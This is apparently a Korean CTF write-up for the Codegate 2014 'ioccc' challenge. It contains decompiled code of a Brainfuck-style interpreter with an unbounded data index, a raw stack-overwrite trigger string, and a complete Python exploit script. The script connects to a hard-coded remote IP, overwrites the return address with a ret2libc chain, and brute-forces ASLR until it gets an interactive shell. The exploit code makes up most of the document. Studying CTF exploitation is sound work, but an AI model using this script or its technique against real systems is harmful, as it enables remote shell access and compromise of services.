python 파일은 왜 있는지 모르겠다. 이것 때문에 더 헷갈렸네ㅡㅡ..
리버싱을 해보면 ret를 바꿀 수 있는 부분을 찾을 수 있다. 코드가 복잡해 보여서 그렇지 자세히 보면 그다지 어렵진 않다. (핵심은 데이터 인덱스 a6에 경계 검사가 전혀 없다는 점이다. '<'로 인덱스를 음수로 내린 뒤 ','로 한 바이트씩 읽어 들이면 buf2 아래쪽 스택, 즉 ret까지 덮어쓸 수 있다.)
그런데, ASLR을 어떻게 우회할지 방법을 모르겠다. 그래서 그냥 brute force로 하기로......
생각보다 빨리 결과가 나온다..ㅎㅎ (32비트 리눅스에서는 libc가 매핑되는 베이스 주소의 랜덤 비트가 8비트 안팎에 불과하고, 페이지 정렬 때문에 하위 12비트는 고정이다. 그래서 추측 주소를 하나로 고정해 두고 접속만 반복하면 평균 수백 번 안에 맞아떨어진다.)
/* Caller side (decompiled): the three 4001-byte, zero-initialised buffers live
 * in this frame.  arg1 = program text, arg2 = data tape, arg3 = the loop stack
 * that f() indexes as int/unsigned long. */
unsigned char arg2[4001]={0,},arg1[4001]={0,},arg3[4001]={0,};
/* At most 4000 bytes are read into a 4001-byte buffer, so the last byte stays
 * NUL and the strlen(inbuf) calls inside f() terminate. */
read( 0,arg1,4000);
/* index_ptr = depth_ptr = 0 (normal mode), a6 = 0 (data index), index = 0 (PC),
 * remain = 100000 (instruction budget), cnt = 0, depth = 0.
 * NOTE(review): _f is presumably the decompiler's name for f() below -- confirm. */
_f(arg1,arg2,(unsigned long*)arg3,0,0,0,0,100000,0,0);
/*
 * Decompiled interpreter step from the target (IDA output, reformatted only).
 *
 *   inbuf   program text ('<' '>' '+' '-' '.' ',' '[' ']'; other bytes are ignored)
 *   buf2    data tape, indexed by a6
 *   buf3    stack of '[' positions, indexed by cnt
 *   index   program counter, remain = remaining step budget
 *
 * When index_ptr and depth_ptr are both non-NULL the call is in "skip" mode:
 * it advances *index_ptr and tracks bracket depth in *depth_ptr until the depth
 * returns to zero, i.e. until *index_ptr sits on the matching ']'.  Normal mode
 * uses this to jump past a loop whose current cell is zero.
 *
 * Vulnerability: a6 is never bounds-checked.  '<' drives it negative, so
 * buf2[a6] addresses memory below the data tape on the stack, and ',' then
 * performs a 1-byte read(0, ...) into that address -- a relative stack write
 * that can reach a saved return address.  '.' is the matching 1-byte leak,
 * and '>' is just as unbounded upward.
 */
void __cdecl f(char *inbuf, char *buf2, int *buf3, int *index_ptr, int *depth_ptr,
               int a6, int index, int remain, unsigned int cnt, int depth)
{
    size_t buflen; // eax@34

    /* ---- skip mode: scan forward to the matching ']' ---- */
    if ( index_ptr )
    {
        if ( depth_ptr )
        {
            if ( *depth_ptr )
            {
                ++*index_ptr;                       /* advances the caller's own index */
                if ( *index_ptr < strlen(inbuf) )
                {
                    if ( inbuf[*index_ptr] == ']' )
                        --*depth_ptr;
                    if ( inbuf[*index_ptr] == '[' )
                        ++*depth_ptr;
                    f(inbuf, buf2, buf3, index_ptr, depth_ptr, a6, index, remain, cnt, depth);
                }
            }
        }
    }

    /* ---- normal mode: execute one instruction, then recurse for the next ---- */
    if ( !index_ptr || !depth_ptr )
    {
        if ( inbuf[index] == '<' )
            --a6;                                   /* no lower bound: a6 may go negative */
        if ( inbuf[index] == '>' )
            ++a6;                                   /* no upper bound either */
        if ( inbuf[index] == '+' )
            ++buf2[a6];
        if ( inbuf[index] == '-' )
            --buf2[a6];
        if ( inbuf[index] == '.' )
            write(1, &buf2[a6], 1u);                /* leaks one byte from buf2 + a6 */
        if ( inbuf[index] == ',' )
            read(0, &buf2[a6], 1u);                 /* writes one stdin byte to buf2 + a6 */
        if ( inbuf[index] == ']' && cnt )
        {
            if ( !buf2[a6] )
                --cnt;                              /* cell is zero: drop one stack entry */
            index = buf3[cnt];                      /* either way, jump to the stored '[' position */
        }
        if ( inbuf[index] == '[' )
        {
            depth = 1;
            if ( buf2[a6] )
            {
                /* The only bound in the function: at most 1000 pushes (entries 1..1000).
                 * NOTE(review): buf3 is the caller's 4001-byte arg3, so entry 1000 of a
                 * 4-byte int array straddles its end -- verify the real layout. */
                if ( cnt <= 999 )
                {
                    ++cnt;
                    buf3[cnt] = index;
                }
            }
            else
            {
                /* cell is zero: skip mode moves index onto the matching ']' */
                f(inbuf, buf2, buf3, &index, &depth, a6, index, remain, cnt, depth);
            }
        }
        ++index;
        buflen = strlen(inbuf);
        if ( buflen > index )
        {
            --remain;                               /* step budget; the caller passes 100000 */
            if ( remain )
                f(inbuf, buf2, buf3, index_ptr, depth_ptr, a6, index, remain, cnt, depth);
        }
    }
}

stack... f function [sfp][ret][argu(40byte)][16byte dummy][buf2][inbuf][buf3]

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>

이런식으로 하면 일단 RET는 덮어써진다. ASLR을 어떻게 우회할 수 있을까?..그냥 brute force 해볼까?..
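#!/usr/bin/python
# cmd_sub.py -- ASLR brute force for the Codegate 2014 "ioccc" service.
#
# The target interprets a program of '<' '>' '+' '-' '.' ',' '[' ']' commands
# and never bounds-checks its data index: enough '<' moves the index below the
# data buffer and each ',' then read()s one stdin byte onto the stack.  That is
# used here to copy a 3-dword ret2libc chain over the saved return address.
#
# The remote libc base is randomised, so the script sends the SAME guess on
# every attempt and simply reconnects until the remote mapping matches.  A
# crash (wrong guess) shows up as a broken pipe on nc's stdin; a surviving
# process after the probe writes is taken as a shell.
#
# Python 2.6/2.7 script (popen2 is Python 2 only); the bytes literals and
# single-argument print() calls keep it importable under Python 3 as well.
import os
import struct
import subprocess
import sys
import time

try:
    import popen2  # deprecated Python 2 module, only needed by the legacy execute()
except ImportError:
    popen2 = None

#cmd = ["./ioccc_fa20522ed15c4956e18388ac02b7c951"]   # local binary, for testing
cmd = ["nc 58.229.183.22 1234"]  # remote CTF service; shell=True expects one command string

# Addresses were taken from the author's local libc: DBASE is the libc base in
# that run and GADGETS the three absolute addresses at that base.  RANDOMBASE
# is the single remote base we gamble on for every connection.
# NOTE(review): the triple looks like a classic ret2libc chain
# [function][return address][argument pointer] (system / exit / "/bin/sh"?) --
# confirm against the libc the values were read from.
RANDOMBASE = 0xb75a2000
DBASE = 0xb7e13000
GADGETS = (0xb7ecee40, 0xb7ece450, 0xb7f7db98)

# Number of '<' needed to walk the interpreter's data index from the data tape
# down to the saved return address; tuned empirically by the author against
# their stack layout notes ([sfp][ret][40-byte args][16-byte pad][buf2]...).
RET_OFFSET = 61

# Written repeatedly after the payload to detect whether the target survived.
PROBE_CMD = b"ls -al . ..\n"


def run_command(command):
    """Start *command* through the shell with a pipe on its stdin.

    Returns the ``subprocess.Popen`` object; the caller owns the process and
    should close ``p.stdin`` and ``p.wait()`` it (see ``_reap``), otherwise
    every failed attempt leaves a zombie behind.  ``shell=True`` is kept
    because callers pass a single command string; *command* is a constant
    here, never user input.
    """
    return subprocess.Popen(command, shell=True, stdin=subprocess.PIPE)


def execute(cmd):
    """Legacy helper: run *cmd* via popen2 and return (stdin, stdout, stderr).

    Not used by the brute-force loop; kept for compatibility.  Raises
    RuntimeError where the popen2 module is unavailable (Python 3).
    """
    if popen2 is None:
        raise RuntimeError("popen2 is unavailable; use run_command() instead")
    std_out, std_in, std_err = popen2.popen3(cmd)
    return std_in, std_out, std_err


def build_payload(randombase=RANDOMBASE, dbase=DBASE, gadgets=GADGETS):
    """Return the little-endian 32-bit chain rebased from *dbase* to *randombase*.

    Each gadget is rebased as ``addr - dbase + randombase`` and packed with
    ``"<L"``; ``struct.error`` is raised if a rebased address leaves the
    32-bit range, which is preferable to silently sending a wrapped value.
    """
    return b"".join(struct.pack("<L", addr - dbase + randombase) for addr in gadgets)


def build_trigger(payload_len, ret_offset=RET_OFFSET):
    """Return the interpreter program that copies *payload_len* stdin bytes over RET.

    ``'<' * ret_offset`` moves the data index below the tape; each ``,>`` pair
    reads one byte from stdin into the current cell and advances.  The trailing
    newline terminates our line and is ignored by the interpreter.
    """
    return b"<" * ret_offset + b",>" * payload_len + b"\n"


def _reap(p):
    """Close the child's stdin, terminate it if still alive and wait for it.

    Keeps failed attempts from accumulating as zombies across hundreds of tries.
    """
    try:
        p.stdin.close()
    except (IOError, OSError):
        pass
    if p.poll() is None:
        try:
            p.terminate()
        except OSError:  # raced with the child's own exit
            pass
    p.wait()


def attempt(command, payload, trigger, probes=30, settle=0.2, probe_interval=0.1):
    """Run one exploitation attempt.

    Sends *trigger*, waits *settle* seconds so the target's single 4000-byte
    read of the program text does not also swallow the payload, then sends
    *payload* (consumed one byte per ',').  It then writes ``PROBE_CMD``
    *probes* times, *probe_interval* seconds apart.  A broken pipe means nc
    exited because the target crashed on a wrong base guess: the process is
    reaped and ``None`` returned.  Otherwise the still-running ``Popen`` is
    returned and is presumed to be connected to a shell.
    """
    p = run_command(command)
    try:
        p.stdin.write(trigger)
        p.stdin.flush()
        time.sleep(settle)
        p.stdin.write(payload)
        p.stdin.flush()
        for _ in range(probes):
            time.sleep(probe_interval)
            p.stdin.write(PROBE_CMD)
            p.stdin.flush()  # flush per write so EPIPE surfaces here, not later
    except (IOError, OSError):  # EPIPE: the far end is gone
        _reap(p)
        return None
    return p


def interact(p):
    """Forward local stdin to the child line by line until EOF or a broken pipe."""
    while True:
        line = sys.stdin.readline()
        if not line:  # EOF on our side: stop instead of spinning on "\n" forever
            break
        data = line if isinstance(line, bytes) else line.encode("utf-8")
        if not data.endswith(b"\n"):
            data += b"\n"
        try:
            p.stdin.write(data)
            p.stdin.flush()
        except (IOError, OSError):  # the remote shell went away
            break


def main():
    """Reconnect with the fixed guess until an attempt survives, then hand over stdin."""
    payload = build_payload()
    trigger = build_trigger(len(payload))
    count = 0
    while True:
        print("try %d" % count)
        count += 1
        p = attempt(cmd, payload, trigger)
        if p is None:
            continue
        try:
            interact(p)
        finally:
            _reap(p)
        break


if __name__ == "__main__":
    main()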